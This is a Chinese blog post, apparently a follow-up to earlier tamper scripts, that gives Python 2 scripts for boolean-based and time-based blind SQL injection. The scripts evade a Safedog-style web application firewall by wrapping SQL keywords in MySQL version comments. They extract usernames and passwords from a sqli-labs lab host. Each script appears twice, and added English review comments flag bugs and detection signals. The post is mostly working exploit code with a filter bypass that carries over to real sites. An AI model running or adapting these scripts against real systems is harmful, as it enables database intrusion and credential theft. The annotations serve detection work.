过狗盲注脚本-布尔/延时
0x01:前言
前面写过关于过狗的tamper,但是局限性也是显而易见的,只支持联合注入...本来是打算把其他注入方式的tamper写一下的,但是实际编写的时候,发现盲注对于sqlmap局限性有点大,与其编写tamper还不如自己写脚本。
0x02:基于布尔
依然是使用内联注释进行绕过,原理已经讲过许多次了,这里就不讲了,直接贴脚本,这里不得不说,wordpress代码处理这块真的垃圾,贴个代码费死劲....
#coding:utf-8
# Boolean-based blind extraction loop against the lab target in the URL below
# (private address, "/sqli/Less-5/" path). The SQL keywords are wrapped in MySQL
# version comments (/*!11444and*/, /*!80000aaa*/) so a signature-based filter
# does not see "and" / "select" / "from" as plain words.
# NOTE(review): this is Python 2 (`print sql` statement; `"are" in r.content`
# compares a str against bytes) -- it does not run unchanged on Python 3.
import requests
# Accumulates the recovered string, one character per outer iteration.
sql=""
# Position inside the extracted value, hard-coded to 16 characters; a longer
# value is silently truncated and a shorter one just yields whatever the trailing
# positions resolve to -- TODO confirm the intended length.
for i in range(1,17):
    # Linear scan of printable ASCII (33..126): one HTTP request per guess, i.e.
    # up to 94 requests per character with a strictly incrementing numeric
    # literal in the query string. From the server side that burst pattern, plus
    # the /*!NNNNN ... */ comment syntax in a GET parameter, is what to alert on,
    # regardless of which keyword is hidden inside the comment.
    for j in range(33,127):
        # Earlier stages of the same extraction, kept verbatim by the author.
        #url = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ ascii(substr((select user/*!80000aaa*/()),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1'='1"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ table_name /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema=database/*!80000aaa*/() limit 3,1),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security' ),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
        # Current stage: i = position, j = candidate ASCII code, both spliced
        # into the query string with str().
        url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
        # No timeout and no error handling: a dropped connection raises and
        # aborts the whole run.
        r = requests.get(url=url)
        # Truth oracle: the author keys on the substring "are" in the response
        # body -- presumably present only for the TRUE branch of the injected
        # condition; verify against the target page. If no candidate matches,
        # nothing is appended and the position is skipped without notice.
        if "are" in r.content:
            sql+=chr(j)
            print sql
            break
# NOTE(review): this listing repeats the boolean-based script immediately above
# verbatim (only the `#coding:utf-8` line is missing). It looks like a paste
# artefact of the blog platform the author complains about in the text, not a
# second variant -- there is nothing new in it. Python 2 syntax (`print sql`).
import requests
# Accumulates the recovered string, one character per outer iteration.
sql=""
# Position inside the extracted value, hard-coded to 16 characters.
for i in range(1,17):
    # Linear scan of printable ASCII (33..126), one request per guess.
    for j in range(33,127):
        # Earlier stages of the same extraction, kept verbatim by the author.
        #url = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ ascii(substr((select user/*!80000aaa*/()),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1'='1"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ table_name /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema=database/*!80000aaa*/() limit 3,1),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security' ),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
        url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
        # No timeout, no error handling.
        r = requests.get(url=url)
        # Oracle: substring "are" in the response body (see the first listing).
        if "are" in r.content:
            sql+=chr(j)
            print sql
            break
0x03:基于延时
#coding:utf-8
# Time-based blind extraction loop against the same lab target. Same
# version-comment obfuscation as the boolean script; the only difference is the
# oracle, which is the client-side request timeout rather than page content.
# NOTE(review): Python 2 (`print sql` statement).
import requests
# Accumulates the recovered string, one character per outer iteration.
sql = ''
# Position inside the extracted value, up to 299 characters.
for x in range(1,300):
    # Linear scan of printable ASCII (33..126), one request per guess.
    for y in range(33,127):
        # Earlier stages of the same extraction, kept verbatim by the author.
        #url1 = "http://192.168.150.139/sqli/Less-9/?id=1' /*!11444and*/ if(((ascii(substr((select database/*!80000aaa*/()),%d,1)))=%d),sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(table_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*//*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/'1' = '1"
        # Template with two %d slots (position, candidate code). The delay is
        # `sleep/**/(/*!2*/)` -- presumably sleep(2) once MySQL strips the
        # version comment, which is why the timeout below is set under 2 s.
        url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        url2 = url1%(x,y)
        try:
            # `f` is never read: only whether the call raised matters.
            f = requests.get(url=url2,timeout=1.5)
        # Inverted oracle: the request timing out is taken as "candidate matched".
        # The bare except catches every exception, not just the timeout -- a DNS
        # failure, refused connection, or even Ctrl-C is recorded as a hit, so the
        # output is unreliable on a flaky link. On the server side this traffic is
        # bursts of near-identical GETs to one path where a small fraction stall
        # for the sleep duration: the response-time bimodality plus `sleep` and
        # /*!...*/ syntax in the query string are the detection signals.
        except:
            sql+=chr(y)
            print sql
            break
# NOTE(review): this listing repeats the time-based script immediately above
# verbatim (only the `#coding:utf-8` line is missing) -- the same paste
# artefact as in the boolean section, not a second variant. Python 2 syntax.
import requests
# Accumulates the recovered string, one character per outer iteration.
sql = ''
# Position inside the extracted value, up to 299 characters.
for x in range(1,300):
    # Linear scan of printable ASCII (33..126), one request per guess.
    for y in range(33,127):
        # Earlier stages of the same extraction, kept verbatim by the author.
        #url1 = "http://192.168.150.139/sqli/Less-9/?id=1' /*!11444and*/ if(((ascii(substr((select database/*!80000aaa*/()),%d,1)))=%d),sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(table_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*//*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/'1' = '1"
        # Template with two %d slots (position, candidate code).
        url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
        url2 = url1%(x,y)
        try:
            # `f` is never read: only whether the call raised matters.
            f = requests.get(url=url2,timeout=1.5)
        # Inverted oracle: a timeout counts as a match. Bare except -- any
        # exception at all (network error, Ctrl-C) is recorded as a hit.
        except:
            sql+=chr(y)
            print sql
            break
0x04:结语
这里依然使用了遍历 ASCII 码的方式,没有使用二分法,所以速度慢得要命。最近也没时间优化,先放这里吧。